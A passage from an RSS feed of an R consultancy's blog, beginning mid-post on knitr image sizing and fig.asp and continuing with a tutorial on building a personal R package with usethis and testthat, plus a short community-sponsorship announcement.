create two images and examine the dimensions with the &lt;code&gt;png::readPNG()&lt;/code&gt; function.&lt;/p&gt;
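&lt;p&gt;The arithmetic can be sketched with a small helper. Note that &lt;code&gt;expected_px()&lt;/code&gt; is a hypothetical function written for this illustration, not part of {knitr}; it assumes, as described above, that the effective &lt;code&gt;dpi&lt;/code&gt; is the chunk &lt;code&gt;dpi&lt;/code&gt; multiplied by &lt;code&gt;fig.retina&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: expected pixel dimension of the generated PNG,
# assuming the effective dpi is dpi * fig.retina
expected_px = function(fig_inches, dpi = 72, fig_retina = 1) {
  round(fig_inches * dpi * fig_retina)
}

expected_px(400 / 72, fig_retina = 1)
#&amp;gt; [1] 400
expected_px(400 / 72, fig_retina = 2)
#&amp;gt; [1] 800
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Comparing these numbers with the output of &lt;code&gt;dim(png::readPNG())&lt;/code&gt; on a generated file is a quick way to check what your own set-up produces.&lt;/p&gt;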
&lt;h2 id="but-what-about-figasp"&gt;But what about fig.asp?&lt;/h2&gt;
&lt;p&gt;The chunk argument &lt;code&gt;fig.asp&lt;/code&gt; controls the aspect ratio of the plot. For example,
setting &lt;code&gt;fig.width = fig.height&lt;/code&gt; would give an aspect ratio of 1. Consequently,
you would only ever define &lt;strong&gt;two&lt;/strong&gt; of &lt;code&gt;fig.width&lt;/code&gt;, &lt;code&gt;fig.height&lt;/code&gt; and &lt;code&gt;fig.asp&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Typically I set &lt;code&gt;fig.asp = 0.7&lt;/code&gt; in the {knitr} header, ignore &lt;code&gt;fig.height&lt;/code&gt; and specify
the &lt;code&gt;fig.width&lt;/code&gt; in each chunk as needed.&lt;/p&gt;
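&lt;p&gt;As a small worked example, the height implied by a given width and aspect ratio can be calculated directly. The variable names below are illustrative, and the calculation assumes &lt;code&gt;fig.asp&lt;/code&gt; is the ratio of height to width, with the default &lt;code&gt;dpi&lt;/code&gt; of 72 and &lt;code&gt;fig.retina = 1&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Set the aspect ratio once for the whole document
fig_asp = 0.7
knitr::opts_chunk$set(fig.asp = fig_asp)

# A chunk with fig.width = 400 / 72 then has an implied height of
# fig.width * fig.asp inches
fig_width = 400 / 72
fig_height = fig_width * fig_asp

# Implied image height in pixels at 72 dpi
round(fig_height * 72)
#&amp;gt; [1] 280
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;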
&lt;h2 id="is-that-all"&gt;Is that all?&lt;/h2&gt;
&lt;p&gt;Unfortunately not. The following three graphics have
all been created using exactly the same {knitr} chunk options&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.width = 400/72&lt;/code&gt; and &lt;code&gt;fig.height = 400/72&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This has been our running {ggplot2} example&lt;/p&gt;
&lt;img src="cache-graphics/image-sizes-b1-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;This is changing the theme via &lt;code&gt;hrbrthemes::theme_ipsum()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; hrbrthemes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="cache-graphics/image-sizes-b2-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;and this is standard base graphics&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(dd&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x, dd&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;y)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="cache-graphics/image-sizes-b3-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Notice that the latter two plots have a larger white space border around them.
You could use a tool to automatically crop the white space, but that changes the dimensions of the image. Instead, you should use some R code to remove the surrounding white space.&lt;/p&gt;
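&lt;p&gt;One possible approach for the base graphics case, offered as a sketch rather than the definitive fix, is to shrink the plot margins with &lt;code&gt;par(mar = ...)&lt;/code&gt; before plotting. The data frame below is stand-in data, and the margin values are illustrative and would need tuning for your own plot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Stand-in data with the same column names as the running example
dd = data.frame(x = 1:10, y = (1:10)^2)

# Margins are given in lines of text as c(bottom, left, top, right);
# the default is c(5.1, 4.1, 4.1, 2.1). par() returns the old settings.
old_par = par(mar = c(4, 4, 0.5, 0.5))
plot(dd$x, dd$y)

# Restore the previous margins so later plots are unaffected
par(old_par)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Because the margins are changed rather than the file being cropped, the image keeps the pixel dimensions requested in the chunk options.&lt;/p&gt;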
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Writing a Personal R Package</title><link>https://www.jumpingrivers.com/blog/personal-r-package/</link><pubDate>Sun, 07 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/personal-r-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/personal-r-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/personal-r-package/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve been using R for a while, you&amp;rsquo;ve likely accumulated a hodgepodge of useful code along the way. Said hodgepodge might include functions you source into multiple projects; bits and bobs that you copy and paste where needed; or code that solved a particularly esoteric problem and will never be applicable elsewhere, but you still enjoy revisiting sometimes. We all do it.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re anything like me, your personal library of code has grown gradually and haphazardly. It&amp;rsquo;s spread across multiple locations, wherever was easiest at the time: a directory on a laptop; a pen drive; line 243 of the script in which it was originally conceived. It&amp;rsquo;s entirely untested, poorly documented and takes a while to decipher every time you return to it. You&amp;rsquo;re proud of some of it, and ashamed at the mess of the rest of it. If you&amp;rsquo;re nodding along so far, this blogpost is for you.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-personal-r-package"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h1 id="a-better-way"&gt;A better way&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://r-pkgs.org/" rel="external"&gt;Writing an R package&lt;/a&gt; can seem daunting at first. If you&amp;rsquo;ve browsed the source code of a popular &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; package then you can be forgiven for feeling overwhelmed. But a package doesn&amp;rsquo;t need to be the next &lt;a href="https://rdatatable.gitlab.io/data.table/" rel="external"&gt;data.table&lt;/a&gt; or have the audience of &lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;dplyr&lt;/a&gt; to be worthwhile. And thanks to the wonderful &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;usethis&lt;/a&gt; package, creating a personal R package could scarcely be easier.&lt;/p&gt;
&lt;p&gt;Plenty of prominent statisticians and data scientists have personal R packages in which they store their miscellaneous functions: &lt;a href="https://github.com/kbroman/broman" rel="external"&gt;Karl Broman&lt;/a&gt;; &lt;a href="https://yihui.org/xfun/" rel="external"&gt;Yihui Xie&lt;/a&gt;; and &lt;a href="https://github.com/dgrtwo/drlib" rel="external"&gt;David Robinson&lt;/a&gt;, to name a few. But nobodies can do the same: &lt;a href="https://github.com/jackhannah95/jafun" rel="external"&gt;I now have one&lt;/a&gt;. The primary audience for a personal R package is yourself, and it doesn&amp;rsquo;t matter if no one else uses or cares about it.&lt;/p&gt;
&lt;h1 id="why-bother"&gt;Why bother?&lt;/h1&gt;
&lt;p&gt;I first created my personal R package because I had the following function saved in a directory called &amp;ldquo;useful-code&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## See discussion below for an improved version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;days_of_week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; days &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;weekdays&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1950-01-01&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;isFALSE&lt;/span&gt;(abbr)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(days)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;substr&lt;/span&gt;(days, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At the time I was working on a project that required aggregating data by day of the week. I was tired of typing out &amp;ldquo;Monday, Tuesday, Wednesday, &amp;hellip;&amp;rdquo; by hand every time, so I &amp;ldquo;borrowed&amp;rdquo; &lt;a href="https://stackoverflow.com/questions/16193549/how-can-i-create-a-vector-containing-the-days-of-the-week/16193697#16193697" rel="external"&gt;the best code I could find on the topic from Stack Overflow&lt;/a&gt; and turned it into a function that did nothing other than return a vector of the days of the week in the formats I required:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Monday&amp;#34; &amp;#34;Tuesday&amp;#34; &amp;#34;Wednesday&amp;#34; &amp;#34;Thursday&amp;#34; &amp;#34;Friday&amp;#34; &amp;#34;Saturday&amp;#34; &amp;#34;Sunday&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Mon&amp;#34; &amp;#34;Tue&amp;#34; &amp;#34;Wed&amp;#34; &amp;#34;Thu&amp;#34; &amp;#34;Fri&amp;#34; &amp;#34;Sat&amp;#34; &amp;#34;Sun&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Every time I wanted to use &lt;code&gt;days_of_week()&lt;/code&gt; in a new project (it was more often than you might think), I copied it from my &amp;ldquo;useful-code&amp;rdquo; directory, pasted it into a &amp;ldquo;functions&amp;rdquo; sub-directory within my project, and used &lt;code&gt;source()&lt;/code&gt; to load it into the relevant script(s). It was laborious and unsustainable; I periodically made (and make) changes to the function but, inevitably, I could never remember all the places I&amp;rsquo;d used it. I ended up using different versions of the same function across multiple projects, which is risky territory to be in even for a function as basic as this one. After reading &lt;a href="https://hilaryparker.com/2013/04/03/personal-r-packages/" rel="external"&gt;Hilary Parker&amp;rsquo;s blogpost on personal R packages&lt;/a&gt;, I decided to give it a try.&lt;/p&gt;
&lt;h1 id="how-to-do-it"&gt;How to do it&lt;/h1&gt;
&lt;p&gt;The aforementioned &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;usethis&lt;/a&gt; package takes care of the setup grunt work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;jafun&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_package&lt;/span&gt;(path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Creating &amp;#39;/data/ncsg3/R_tmp/RtmpKbRqBJ/jafun/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Setting active project to &amp;#39;/data/ncsg3/R_tmp/RtmpKbRqBJ/jafun&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Creating &amp;#39;R/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Writing &amp;#39;DESCRIPTION&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Package: jafun&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Title: What the Package Does (One Line, Title Case)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Version: 0.0.0.9000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Authors@R (parsed):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * First Last &amp;lt;first.last@example.com&amp;gt; [aut, cre] (YOUR-ORCID-ID)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Description: What the package does (one paragraph).&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; License: `use_mit_license()`, `use_gpl3_license()` or friends to pick a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; license&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Encoding: UTF-8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Roxygen: list(markdown = TRUE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; RoxygenNote: 7.1.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Writing &amp;#39;NAMESPACE&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Setting active project to &amp;#39;&amp;lt;no active project&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Move your function(s) into the &lt;a href="https://r-pkgs.org/r.html" rel="external"&gt;&amp;ldquo;R&amp;rdquo; directory&lt;/a&gt;, add some &lt;a href="https://r-pkgs.org/man.html" rel="external"&gt;documentation&lt;/a&gt;, build the package with Ctrl + Shift + B, and voila:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jafun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jafun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id="next-steps"&gt;Next steps&lt;/h1&gt;
&lt;p&gt;Once you&amp;rsquo;ve developed the basis of your personal R package, you can spruce it up with as many or as few additional features as you&amp;rsquo;d like to. Adding your name and some basic details about the package to the &lt;a href="https://r-pkgs.org/description.html" rel="external"&gt;Description file&lt;/a&gt; is helpful. &lt;a href="https://r-pkgs.org/tests.html" rel="external"&gt;Unit testing&lt;/a&gt;, &lt;a href="https://r-pkgs.org/release.html" rel="external"&gt;releases&lt;/a&gt; and &lt;a href="https://r-pkgs.org/r-cmd-check.html" rel="external"&gt;automated checking&lt;/a&gt; are present in most packages. Putting your package on &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; allows you (and others) to install your package remotely using &lt;code&gt;remotes::install_github()&lt;/code&gt; without requiring a local copy of the source code. None of that is compulsory though. Your package only has to be as detailed as you want it to be.&lt;/p&gt;
&lt;p&gt;Your package will, inevitably, evolve over time. You&amp;rsquo;ll add new functions and improve upon existing ones. By way of example, a more efficient implementation of the aforementioned &lt;code&gt;days_of_week()&lt;/code&gt; would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;days_of_week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(abbreviate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1950-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;weekdays&lt;/span&gt;(dates, abbreviate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; abbreviate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This would negate the need for an &lt;code&gt;if&lt;/code&gt; statement, and it would &lt;a href="https://github.com/jackhannah95/jafun/issues/3" rel="external"&gt;fix a bug&lt;/a&gt; in the existing version. There are undoubtedly plenty of implementations more efficient than my original one. But I wrote &lt;code&gt;days_of_week()&lt;/code&gt; for myself, with the skills I had at the time, and it did what I needed it to do. Any package maintainer would stress the importance of refining your code over time, but it doesn&amp;rsquo;t need to be at its optimum from the outset to be worth going in a package.&lt;/p&gt;
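&lt;p&gt;A unit test is one way to make this kind of refinement safer. The following is a minimal sketch using {testthat}, assuming the improved function above; the checks are deliberately limited to the type and length of the result because the day names returned by &lt;code&gt;weekdays()&lt;/code&gt; depend on the locale.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(testthat)

# The improved implementation, repeated so the example is self-contained
days_of_week = function(abbreviate = FALSE) {
  dates = as.Date(1:7, origin = &amp;#34;1950-01-01&amp;#34;)
  weekdays(dates, abbreviate = abbreviate)
}

test_that(&amp;#34;days_of_week() returns seven day names&amp;#34;, {
  # Check both the full and the abbreviated forms
  for (abbr in c(FALSE, TRUE)) {
    days = days_of_week(abbreviate = abbr)
    expect_type(days, &amp;#34;character&amp;#34;)
    expect_length(days, 7)
  }
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In a package, a test like this would normally live in the &lt;code&gt;tests/testthat/&lt;/code&gt; directory rather than alongside the function definition.&lt;/p&gt;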
&lt;p&gt;The longer you use R, the more miscellaneous code you&amp;rsquo;ll amass. And the more you amass, the harder it&amp;rsquo;ll be to keep track of. Creating a personal R package provides a sustainable and pain-free method of storing, growing and re-using your unique library of code. It might even provide a safe incubator to learn the ropes of package development prior to making open source contributions elsewhere. But at the very least, it&amp;rsquo;ll stop you from dipping into that &amp;ldquo;useful-code&amp;rdquo; directory every time you want a vector of the days of the week.&lt;/p&gt;
&lt;h1 id="notes-and-thanks"&gt;Notes and thanks&lt;/h1&gt;
&lt;p&gt;Most of the links in this blogpost are from the &lt;a href="https://r-pkgs.org/index.html" rel="external"&gt;R Packages&lt;/a&gt; book by &lt;a href="http://hadley.nz/" rel="external"&gt;Hadley Wickham&lt;/a&gt; and &lt;a href="https://jennybryan.org/" rel="external"&gt;Jenny Bryan&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/personal-r-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers and WhyR partnership</title><link>https://www.jumpingrivers.com/blog/why-r-partnership/</link><pubDate>Wed, 25 Nov 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-r-partnership/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-r-partnership/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-r-partnership/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We love supporting the community around the open source tools that we use on a daily basis. In the past, &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; has helped useR user groups and SatRdays events to happen by enabling &lt;a href="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/" rel="external"&gt;frictionless sponsorship for European groups&lt;/a&gt;. We believe that it is our duty to help grow the community that helps us. With that in mind, it is our honour to announce that we are proudly sponsoring a new season of events hosted by &lt;a href="http://whyr.pl/foundation/about/" rel="external"&gt;WhyR&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-why-r-partnership"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;WhyR is a team of R enthusiasts coming from both business and academia who aim to support local R communities around the world. The foundation organises events, such as conferences, hackathons and webinars, focusing on the worldwide use of R statistical software. The initiative is well known for its remarkable commitment to knowledge and diversion for the &lt;a href="https://www.r-project.org/" rel="external"&gt;R programming language&lt;/a&gt; and open source sphere.&lt;/p&gt;
&lt;p&gt;Their main goals are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;spreading knowledge about the R statistical package,&lt;/li&gt;
&lt;li&gt;supporting programs and pro-development initiatives in the fields of economics, mathematics, statistics and data science to serve educational activities,&lt;/li&gt;
&lt;li&gt;supporting cooperation between the scientific and business environment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We find those align well with the Jumping Rivers mission and are delighted to work beside such an honourable organisation.&lt;/p&gt;
&lt;p&gt;Stay tuned on our &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt; and &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd/" rel="external"&gt;LinkedIn&lt;/a&gt; to hear more about the events.&lt;/p&gt;
